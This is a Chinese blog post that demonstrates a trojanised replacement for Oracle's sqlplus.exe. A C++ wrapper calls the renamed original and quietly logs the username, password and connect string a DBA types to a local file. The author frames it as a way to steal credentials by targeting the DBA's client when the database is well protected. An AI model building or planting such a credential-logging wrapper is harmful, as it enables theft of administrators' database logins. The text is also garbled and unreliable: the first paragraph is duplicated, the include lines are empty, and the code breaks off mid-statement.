当DBA登录本地或远程数据库时,为了省事,用 sqlplus 用户名/ 密码 @连接服务名 的方式登录数据库是再平常不过了,而我们如果将Oracle的SQLPlus换成我们自己的实现,然后当使用时,记录下它的登录信息,就得到了数据库的用户名,密码等信息。 这是一种很简单
当DBA登录本地或远程数据库时,为了省事,用"sqlplus 用户名/密码@连接服务名" 的方式登录数据库是再平常不过了,而我们如果将Oracle的SQLPlus换成我们自己的实现,然后当使用时,记录下它的登录信息,就得到了数据库的用户名,密码等信息。
这是一种很简单的,偷龙转凤的方式,有其局限性。但有时,如果数据库本身的防护很严,从DBA客户端这边下手,利用这种方式有时也能有意外的收获。
效果图:
这种方式跑起来和Oracle原来的是一模一样的. 光看是看不来什么地。
被记录下的登录信息:
代码如下:
/**
*author: xiongchuanliang
*desc: 用自定义的sqlplus替换掉Oracle原版的,并在自定义的程序中记录下用户的登录信息的演示
1. 找到Oracle自带的sqlplus.exe,将其命名为其它文件
2. 用自定义的替换掉原版
*/
#include
#include
#include
#include
#include
using namespace std;
HRESULT CMDEx(const char *pCmd) ;
//将原版的sqlplus.exe改为sqlplus_ora.exe";
const string sqlplus_path = "C:/oracle/product/11.2.0/dbhome_1/BIN/sqlplus_ora.exe";
const string oper_log = "C:/mysqlplus.log";
int main(int argc,char* argv[])
{
string sqlplus_cmd = sqlplus_path;
ofstream flog(oper_log,ios::app);
SYSTEMTIME sys;
if(flog){
GetLocalTime(&sys);
flog<
MAIL: xcl_168@aliyun.com
BLOG: http://blog.csdn.net/xcl168
